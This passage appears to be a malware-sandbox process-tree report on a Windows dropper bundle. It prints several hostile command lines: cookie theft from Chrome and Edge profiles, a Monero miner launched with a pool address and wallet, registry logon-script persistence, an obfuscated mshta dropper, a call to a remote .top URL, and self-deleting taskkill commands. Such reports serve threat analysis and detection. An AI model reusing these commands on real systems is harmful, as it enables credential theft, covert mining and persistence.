C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 7645⤵
- Program crash
PID:5884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 7405⤵
- Program crash
PID:4292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 8765⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7432
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "po04WAP4mZxGKoA0vPcy97Tk.exe" /f & erase "C:\Users\Admin\Documents\po04WAP4mZxGKoA0vPcy97Tk.exe" & exit3⤵PID:6552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "po04WAP4mZxGKoA0vPcy97Tk.exe" /f4⤵
- Kills process with taskkill
PID:5556
-
-
-
-
C:\Users\Admin\Documents\1GK5k3xmn3O_fPhUrAXhez54.exe"C:\Users\Admin\Documents\1GK5k3xmn3O_fPhUrAXhez54.exe"2⤵
- Executes dropped EXE
PID:2724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "1GK5k3xmn3O_fPhUrAXhez54.exe" /f & erase "C:\Users\Admin\Documents\1GK5k3xmn3O_fPhUrAXhez54.exe" & exit3⤵PID:5952
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1GK5k3xmn3O_fPhUrAXhez54.exe" /f4⤵
- Kills process with taskkill
PID:5924
-
-
-
-
C:\Users\Admin\Documents\yoC0SuaMrORdRlbsDHFHyeUd.exe"C:\Users\Admin\Documents\yoC0SuaMrORdRlbsDHFHyeUd.exe"2⤵
- Executes dropped EXE
PID:1156 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5376
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
PID:5836
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6100
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6324
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:6424
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6832
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:6880
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4764 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6120
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10488
-
-
-
-
C:\Users\Admin\Documents\Jio2aWKJp8cWMZdrGeQ8KEbN.exe"C:\Users\Admin\Documents\Jio2aWKJp8cWMZdrGeQ8KEbN.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Users\Admin\Documents\sJmbQWB0NpkfM_pWcJqhL9vW.exe"C:\Users\Admin\Documents\sJmbQWB0NpkfM_pWcJqhL9vW.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Users\Admin\Documents\mG4d8IwTgRrAL4FE5iY8YRB7.exe"C:\Users\Admin\Documents\mG4d8IwTgRrAL4FE5iY8YRB7.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Users\Admin\Documents\gAScRkDwlUWDTNNmOfKcnrA7.exe"C:\Users\Admin\Documents\gAScRkDwlUWDTNNmOfKcnrA7.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe"C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3712 -
C:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exeC:\Users\Admin\Documents\7SrzRNSSzQZ1yRbsPelarolG.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
-
C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe"C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:688 -
C:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exeC:\Users\Admin\Documents\ZilQa116kCxMyJ4DYppJKSNT.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
-
C:\Users\Admin\Documents\_bBir4fW40ZAieqy4xVVVqdZ.exe"C:\Users\Admin\Documents\_bBir4fW40ZAieqy4xVVVqdZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2808 -
C:\Users\Admin\AppData\Roaming\1024372.exe"C:\Users\Admin\AppData\Roaming\1024372.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Users\Admin\AppData\Roaming\8222320.exe"C:\Users\Admin\AppData\Roaming\8222320.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3144 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:2748
-
-
-
C:\Users\Admin\AppData\Roaming\8195904.exe"C:\Users\Admin\AppData\Roaming\8195904.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Users\Admin\AppData\Roaming\6774205.exe"C:\Users\Admin\AppData\Roaming\6774205.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5192
-
-
-
C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe"C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3832 -
C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe"C:\Users\Admin\Documents\_fo2akGzHM8e3HDnYwqptuNS.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
C:\Users\Admin\Documents\r7KWMen_6LYljFTXNU21pyHC.exe"C:\Users\Admin\Documents\r7KWMen_6LYljFTXNU21pyHC.exe"2⤵
- Executes dropped EXE
PID:1360
-
-
C:\Users\Admin\Documents\EVawsdwdyWR8sahgToN8uJ5E.exe"C:\Users\Admin\Documents\EVawsdwdyWR8sahgToN8uJ5E.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Users\Admin\Documents\j6dICuruH5OX6Xd08n6Q5qCn.exe"C:\Users\Admin\Documents\j6dICuruH5OX6Xd08n6Q5qCn.exe"2⤵
- Executes dropped EXE
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\is-CPSIK.tmp\j6dICuruH5OX6Xd08n6Q5qCn.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPSIK.tmp\j6dICuruH5OX6Xd08n6Q5qCn.tmp" /SL5="$201FA,138429,56832,C:\Users\Admin\Documents\j6dICuruH5OX6Xd08n6Q5qCn.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4140 -
C:\Users\Admin\AppData\Local\Temp\is-60525.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-60525.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
PID:5052 -
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵
- Executes dropped EXE
PID:6044 -
C:\Users\Admin\AppData\Local\Temp\is-U6S6Q.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-U6S6Q.tmp\Stats.tmp" /SL5="$10378,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4536 -
C:\Users\Admin\AppData\Local\Temp\is-43O8M.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-43O8M.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6856
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵PID:6084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 7726⤵
- Program crash
PID:6824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 7446⤵
- Program crash
PID:6776
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5152 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586615 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:1160
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\is-B7Q28.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-B7Q28.tmp\WEATHER Manager.tmp" /SL5="$10396,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5616 -
C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6744 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-Q6969.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586615 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:8048
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\is-MT152.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-MT152.tmp\Inlog.tmp" /SL5="$1037C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5296 -
C:\Users\Admin\AppData\Local\Temp\is-EOR38.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EOR38.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5592 -
C:\Users\Admin\AppData\Local\Temp\is-64GDD.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-64GDD.tmp\Setup.tmp" /SL5="$104D4,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-EOR38.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4640 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:5528
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:6352
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:9380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:10108
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵
- Modifies registry class
PID:9812
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:68
-
-
C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\vdi_compiler"9⤵PID:4696
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LJB30.tmp\{app}\vdi_compiler.exe"10⤵PID:10564
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:10676
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
- Checks computer location settings
PID:9144
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5244 -
C:\Users\Admin\AppData\Roaming\4186711.exe"C:\Users\Admin\AppData\Roaming\4186711.exe"6⤵PID:6720
-
-
C:\Users\Admin\AppData\Roaming\3855574.exe"C:\Users\Admin\AppData\Roaming\3855574.exe"6⤵
- Suspicious behavior: SetClipboardViewer
PID:6768
-
-
C:\Users\Admin\AppData\Roaming\8427271.exe"C:\Users\Admin\AppData\Roaming\8427271.exe"6⤵PID:1512
-
-
C:\Users\Admin\AppData\Roaming\2407460.exe"C:\Users\Admin\AppData\Roaming\2407460.exe"6⤵PID:4380
-
-
C:\Users\Admin\AppData\Roaming\5835763.exe"C:\Users\Admin\AppData\Roaming\5835763.exe"6⤵PID:6848
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:5512 -
C:\Users\Admin\Documents\fGo2SwgVDQo0h419nKTWto4E.exe"C:\Users\Admin\Documents\fGo2SwgVDQo0h419nKTWto4E.exe"6⤵
- Loads dropped DLL
PID:7088
-
-
C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe"C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe"6⤵
- Suspicious use of SetThreadContext
PID:6132 -
C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exeC:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe7⤵PID:6948
-
-
C:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exeC:\Users\Admin\Documents\De_Zl6GNEMYTi1u_W7qtCpq6.exe7⤵PID:7228
-
-
-
C:\Users\Admin\Documents\p8f80fEi4lip7uaO8ZYj3Mwf.exe"C:\Users\Admin\Documents\p8f80fEi4lip7uaO8ZYj3Mwf.exe"6⤵PID:5464
-
-
C:\Users\Admin\Documents\jyGoXTSknssMRF52BzVwSycd.exe"C:\Users\Admin\Documents\jyGoXTSknssMRF52BzVwSycd.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7148
-
-
C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe"C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe"6⤵
- Suspicious use of SetThreadContext
PID:6696 -
C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe"C:\Users\Admin\Documents\uTCoy4Q77ijSrWZi4OmLb7Ab.exe"7⤵PID:7928
-
-
-
C:\Users\Admin\Documents\AOKTMuiL4n2OPtUgKhVYTT6A.exe"C:\Users\Admin\Documents\AOKTMuiL4n2OPtUgKhVYTT6A.exe"6⤵PID:1832
-
-
C:\Users\Admin\Documents\V6XNNdcDwuQpDVchLbXwr7vc.exe"C:\Users\Admin\Documents\V6XNNdcDwuQpDVchLbXwr7vc.exe"6⤵PID:4884
-
-
C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe"C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe"6⤵
- Suspicious use of SetThreadContext
PID:1232 -
C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe"C:\Users\Admin\Documents\RTa9h1GEw8MZAkMnDG_Wd_nd.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7400
-
-
-
C:\Users\Admin\Documents\zArUN9hOnHgjUb5JXv3UV9dL.exe"C:\Users\Admin\Documents\zArUN9hOnHgjUb5JXv3UV9dL.exe"6⤵PID:736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 4807⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6636
-
-
-
C:\Users\Admin\Documents\hSuVUnsWY7mz347tCpvO6Hm7.exe"C:\Users\Admin\Documents\hSuVUnsWY7mz347tCpvO6Hm7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7084
-
-
C:\Users\Admin\Documents\oqpkkhRVfV5mzpQDPuUUjBc7.exe"C:\Users\Admin\Documents\oqpkkhRVfV5mzpQDPuUUjBc7.exe"6⤵PID:6156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "oqpkkhRVfV5mzpQDPuUUjBc7.exe" /f & erase "C:\Users\Admin\Documents\oqpkkhRVfV5mzpQDPuUUjBc7.exe" & exit7⤵PID:4236
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "oqpkkhRVfV5mzpQDPuUUjBc7.exe" /f8⤵
- Loads dropped DLL
- Kills process with taskkill
PID:1040
-
-
-
-
C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe"C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe"6⤵PID:1036
-
C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe"C:\Users\Admin\Documents\AI9gILVsa0vDYCvwtcp4g14a.exe" -q7⤵PID:6508
-
-
-
C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"6⤵PID:1600
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )7⤵PID:7260
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\xEatncuF4o0u8h9n1YArmkEa.exe" ) do taskkill -IM "%~nXW" -f8⤵PID:9132
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "xEatncuF4o0u8h9n1YArmkEa.exe" -f9⤵
- Kills process with taskkill
PID:7528
-
-
-
-
-
C:\Users\Admin\Documents\zuP28SItP5DxU9zGKol54g1U.exe"C:\Users\Admin\Documents\zuP28SItP5DxU9zGKol54g1U.exe"6⤵PID:4792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 3887⤵
- Program crash
PID:7432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 4167⤵
- Program crash
PID:7692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 4567⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 6247⤵
- Program crash
PID:5380
-
-
-
C:\Users\Admin\Documents\6Mj55rQqMBIzkP38H2LXBBOA.exe"C:\Users\Admin\Documents\6Mj55rQqMBIzkP38H2LXBBOA.exe"6⤵PID:5508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 6607⤵
- Program crash
PID:724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 6647⤵
- Program crash
PID:7436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 6327⤵
- Program crash
PID:7680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 6807⤵
- Program crash
PID:7896
-
-
-
C:\Users\Admin\Documents\TBy7CdM0udeAquD40u2SNKIL.exe"C:\Users\Admin\Documents\TBy7CdM0udeAquD40u2SNKIL.exe"6⤵PID:2936
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "TBy7CdM0udeAquD40u2SNKIL.exe" /f & erase "C:\Users\Admin\Documents\TBy7CdM0udeAquD40u2SNKIL.exe" & exit7⤵PID:8816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "TBy7CdM0udeAquD40u2SNKIL.exe" /f8⤵
- Kills process with taskkill
PID:8992
-
-
-
-
C:\Users\Admin\Documents\mpQxRx5lFyQXTsX6xCBivFPL.exe"C:\Users\Admin\Documents\mpQxRx5lFyQXTsX6xCBivFPL.exe"6⤵PID:2920
-
-
C:\Users\Admin\Documents\TN63QwOcdajBxzLBcsRLhJMC.exe"C:\Users\Admin\Documents\TN63QwOcdajBxzLBcsRLhJMC.exe"6⤵PID:2848
-
-
C:\Users\Admin\Documents\ZFsgv3ebJ4tVSQycSj7b1ZVv.exe"C:\Users\Admin\Documents\ZFsgv3ebJ4tVSQycSj7b1ZVv.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5688
-
-
C:\Users\Admin\Documents\uPRmADkV8NoeUbejA2tfPDg_.exe"C:\Users\Admin\Documents\uPRmADkV8NoeUbejA2tfPDg_.exe"6⤵
- Loads dropped DLL
PID:5044
-
-
C:\Users\Admin\Documents\6Oj4iZrHyE2AXuMcCn23_GJa.exe"C:\Users\Admin\Documents\6Oj4iZrHyE2AXuMcCn23_GJa.exe"6⤵PID:3556
-
C:\Users\Admin\AppData\Roaming\7060684.exe"C:\Users\Admin\AppData\Roaming\7060684.exe"7⤵PID:6504
-
-
C:\Users\Admin\AppData\Roaming\4349180.exe"C:\Users\Admin\AppData\Roaming\4349180.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:7208
-
-
C:\Users\Admin\AppData\Roaming\6329368.exe"C:\Users\Admin\AppData\Roaming\6329368.exe"7⤵
- Executes dropped EXE
PID:5048
-
-
C:\Users\Admin\AppData\Roaming\5605311.exe"C:\Users\Admin\AppData\Roaming\5605311.exe"7⤵PID:3320
-
-
-
C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe"C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe"6⤵
- Suspicious use of SetThreadContext
PID:7104 -
